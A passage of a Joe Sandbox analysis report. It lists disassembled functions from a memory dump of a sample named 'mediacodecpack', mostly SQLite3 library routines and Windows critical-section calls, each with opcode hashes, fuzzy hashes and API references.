                                                                                        • Associated: 00000002.00000002.3558128487.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558148690.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_60900000_mediacodecpack.jbxd
                                                                                        Similarity
                                                                                        • API ID: sqlite3_aggregate_contextsqlite3_value_numeric_type
                                                                                        • String ID:
                                                                                        • API String ID: 3265351223-3916222277
                                                                                        • Opcode ID: 46809e466d9dc696839b8d734d1d71a7cd961db8d22299a3a9f395bc6b436a6c
                                                                                        • Instruction ID: a3c0f903ff645dd1c5a8146eaa2078e963ad6c1b8d1bbf61d5d4caeb1888773d
                                                                                        • Opcode Fuzzy Hash: 46809e466d9dc696839b8d734d1d71a7cd961db8d22299a3a9f395bc6b436a6c
                                                                                        • Instruction Fuzzy Hash: 19119EB0A0C6589BDF059F69C4D539A7BF6AF39308F0044E8D8D08B205E771CD94CB81
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3557951826.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                        • Associated: 00000002.00000002.3557936161.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558063665.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558081558.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558110033.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558128487.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558148690.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_60900000_mediacodecpack.jbxd
                                                                                        Similarity
                                                                                        • API ID: sqlite3_stricmp
                                                                                        • String ID: log
                                                                                        • API String ID: 912767213-2403297477
                                                                                        • Opcode ID: 32625358f7d37366d1c1d188942de81712d107425b8b720a67b4b84d1adec0cd
                                                                                        • Instruction ID: cbf508da25866b0a35bc2ca480d64d7c482f0664b0359b741109bd545b4f9ff5
                                                                                        • Opcode Fuzzy Hash: 32625358f7d37366d1c1d188942de81712d107425b8b720a67b4b84d1adec0cd
                                                                                        • Instruction Fuzzy Hash: FD11DAB07087048BE725AF66C49535EBBB3ABA1708F10C42CE4854B784C7BAC986DB42
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3557951826.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                        • Associated: 00000002.00000002.3557936161.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558063665.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558081558.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558110033.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558128487.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558148690.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_60900000_mediacodecpack.jbxd
                                                                                        Similarity
                                                                                        • API ID: sqlite3_strnicmp
                                                                                        • String ID: SQLITE_
                                                                                        • API String ID: 1961171630-787686576
                                                                                        • Opcode ID: 6b56a851e7df47422a7a29131339b4dfcb3302745a705f9abe90012807219487
                                                                                        • Instruction ID: 6d5ef3c0fd507030b5e8170497320435726bf3f0db30f2d6f2734bcd7f756fb3
                                                                                        • Opcode Fuzzy Hash: 6b56a851e7df47422a7a29131339b4dfcb3302745a705f9abe90012807219487
                                                                                        • Instruction Fuzzy Hash: 2501D6B190C3505FD7419F29CC8075BBFFAEBA5258F10486DE89687212D374DC81D781
                                                                                        APIs
                                                                                        • sqlite3_value_bytes.SQLITE3 ref: 6091A1DB
                                                                                        • sqlite3_value_blob.SQLITE3 ref: 6091A1FA
                                                                                        Strings
                                                                                        • Invalid argument to rtreedepth(), xrefs: 6091A1E3
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3557951826.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                        • Associated: 00000002.00000002.3557936161.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558063665.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558081558.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558110033.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558128487.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558148690.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_60900000_mediacodecpack.jbxd
                                                                                        Similarity
                                                                                        • API ID: sqlite3_value_blobsqlite3_value_bytes
                                                                                        • String ID: Invalid argument to rtreedepth()
                                                                                        • API String ID: 1063208240-2843521569
                                                                                        • Opcode ID: 11a8b631faa983fdd1b04a57150add771201859657fb9a8a7ca9793758d49f10
                                                                                        • Instruction ID: c9489564a96cd83e586e3a08c251b8a8c74d553169181c25a19da25ffef599d7
                                                                                        • Opcode Fuzzy Hash: 11a8b631faa983fdd1b04a57150add771201859657fb9a8a7ca9793758d49f10
                                                                                        • Instruction Fuzzy Hash: 0FF0A4B2A0C2589BDB00AF2CC88255577A6FF24258F1045D9E9858F306EB34DDD5C7D1
                                                                                        APIs
                                                                                        • sqlite3_soft_heap_limit64.SQLITE3 ref: 609561D7
                                                                                          • Part of subcall function 6092A43E: sqlite3_initialize.SQLITE3 ref: 6092A450
                                                                                          • Part of subcall function 6092A43E: sqlite3_mutex_enter.SQLITE3 ref: 6092A466
                                                                                          • Part of subcall function 6092A43E: sqlite3_mutex_leave.SQLITE3 ref: 6092A47F
                                                                                          • Part of subcall function 6092A43E: sqlite3_memory_used.SQLITE3 ref: 6092A4BA
                                                                                        • sqlite3_soft_heap_limit64.SQLITE3 ref: 609561EB
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3557951826.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                        • Associated: 00000002.00000002.3557936161.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558063665.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558081558.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558110033.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558128487.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558148690.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_60900000_mediacodecpack.jbxd
                                                                                        Similarity
                                                                                        • API ID: sqlite3_soft_heap_limit64$sqlite3_initializesqlite3_memory_usedsqlite3_mutex_entersqlite3_mutex_leave
                                                                                        • String ID: soft_heap_limit
                                                                                        • API String ID: 1251656441-405162809
                                                                                        • Opcode ID: 0a3178e3d5348c0d1dba646aca47308acc52713326f376e4eba91e5107f5ba07
                                                                                        • Instruction ID: 8891d4bbc0f5aef5547f00e3070395c34840fc2012d087b050684f6162b0ba7d
                                                                                        • Opcode Fuzzy Hash: 0a3178e3d5348c0d1dba646aca47308acc52713326f376e4eba91e5107f5ba07
                                                                                        • Instruction Fuzzy Hash: C2014B71A083188BC710EF98D8417ADB7F2BFA5318F508629E8A49B394D730DC42CF41
                                                                                        APIs
                                                                                        • sqlite3_log.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,6094A57F), ref: 6092522A
                                                                                        • sqlite3_log.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,6094A57F), ref: 60925263
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3557951826.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                        • Associated: 00000002.00000002.3557936161.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558063665.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558081558.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558110033.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558128487.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558148690.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_60900000_mediacodecpack.jbxd
                                                                                        Similarity
                                                                                        • API ID: sqlite3_log
                                                                                        • String ID: NULL
                                                                                        • API String ID: 632333372-324932091
                                                                                        • Opcode ID: f56f6a0e8a895df1b0101c46b9851dc3af9ce5b0d95800d46be4b721d61d1ab1
                                                                                        • Instruction ID: 5a36de60e8574ea04015b231464f09686a41744340efbe7a8a869d8181b3dc96
                                                                                        • Opcode Fuzzy Hash: f56f6a0e8a895df1b0101c46b9851dc3af9ce5b0d95800d46be4b721d61d1ab1
                                                                                        • Instruction Fuzzy Hash: BAF0A070238301DBD7102FA6E44230E7AEBABB0798F48C43C95A84F289D7B5C844CB63
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3557951826.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                        • Associated: 00000002.00000002.3557936161.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558063665.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558081558.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558110033.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558128487.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558148690.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_60900000_mediacodecpack.jbxd
                                                                                        Similarity
                                                                                        • API ID: CriticalSection$EnterLeavefree
                                                                                        • String ID:
                                                                                        • API String ID: 4020351045-0
                                                                                        • Opcode ID: 13d179c58506242de641c1793229aaf6d73ae3266bd26a3d41fb94aeb54caf06
                                                                                        • Instruction ID: 980a39aab3b848caec2c27f45d5308e77b440585e3cd6ccd446b63c63d51e1b6
                                                                                        • Opcode Fuzzy Hash: 13d179c58506242de641c1793229aaf6d73ae3266bd26a3d41fb94aeb54caf06
                                                                                        • Instruction Fuzzy Hash: 2D018070B293058BDB10DF28C985919BBFBABB6308B20855CE499D7355D770DC80EB62
                                                                                        APIs
                                                                                        • EnterCriticalSection.KERNEL32(?,?,?,6096D655,?,?,?,?,?,6096CF88), ref: 6096D4DF
                                                                                        • TlsGetValue.KERNEL32(?,?,?,?,6096D655,?,?,?,?,?,6096CF88), ref: 6096D4F5
                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,6096D655,?,?,?,?,?,6096CF88), ref: 6096D4FD
                                                                                        • LeaveCriticalSection.KERNEL32(?,?,?,?,6096D655,?,?,?,?,?,6096CF88), ref: 6096D520
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3557951826.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                        • Associated: 00000002.00000002.3557936161.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558063665.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558081558.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558110033.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558128487.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558148690.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_60900000_mediacodecpack.jbxd
                                                                                        Similarity
                                                                                        • API ID: CriticalSection$EnterErrorLastLeaveValue
                                                                                        • String ID:
                                                                                        • API String ID: 682475483-0
                                                                                        • Opcode ID: 79e4c3a08b5363d98cc33068bb7bbdcd271105d9d9d9c252471cf05fac27a945
                                                                                        • Instruction ID: 6dd43474153c21470d2d90641e64b96ed0da30414b2d41baa8b5e8831fa3fcb2
                                                                                        • Opcode Fuzzy Hash: 79e4c3a08b5363d98cc33068bb7bbdcd271105d9d9d9c252471cf05fac27a945
                                                                                        • Instruction Fuzzy Hash: 9AF0F972A163104BEB10AF659CC1A5A7BFDEFB1218F100048FC6197354E770DC40D6A2